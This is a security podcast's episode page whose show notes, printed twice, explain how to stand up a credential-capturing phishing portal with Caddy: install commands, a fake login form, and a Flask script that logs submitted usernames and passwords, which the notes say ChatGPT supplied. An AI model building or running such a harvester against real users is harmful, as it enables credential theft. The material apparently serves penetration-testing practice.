Sign up to save your podcasts
Or
Share 7MS #583: Cred-Capturing Phishing with Caddy Server
Share to email
Share to Facebook
Share to X
Share to email
Share to Facebook
Share to X
Or
7MS #583: Cred-Capturing Phishing with Caddy Server
Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:
sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -yCreate an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:
domain.comThen type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:
Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; }User Name:
Password:
Unauthorized use is prohibited!
This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:
from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)If you don't have Flask installed, do this:
sudo apt install python3-pip -y sudo pip install FlaskRun this file in one session, then in your index.html file make a small tweak in the form action directive:
Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!
View all episodes
By Brian Johnson
4.7
6868 ratings
Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:
sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -yCreate an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:
domain.comThen type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:
Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; }User Name:
Password:
Unauthorized use is prohibited!
This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:
from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)If you don't have Flask installed, do this:
sudo apt install python3-pip -y sudo pip install FlaskRun this file in one session, then in your index.html file make a small tweak in the form action directive:
Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!
More shows like 7 Minute Security
View all
Hacked
184 Listeners
Security Now (Audio)
2,002 Listeners
Defensive Security Podcast - Malware, Hacking, Cyber Security & Infosec
370 Listeners
Risky Business
375 Listeners
SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
637 Listeners
CyberWire Daily
1,016 Listeners
Smashing Security
322 Listeners
Click Here
416 Listeners
Darknet Diaries
8,010 Listeners
Cybersecurity Today
175 Listeners
Hacking Humans
314 Listeners
CISO Series Podcast
188 Listeners
Defense in Depth
73 Listeners
Cyber Security Headlines
134 Listeners
Risky Bulletin
44 Listeners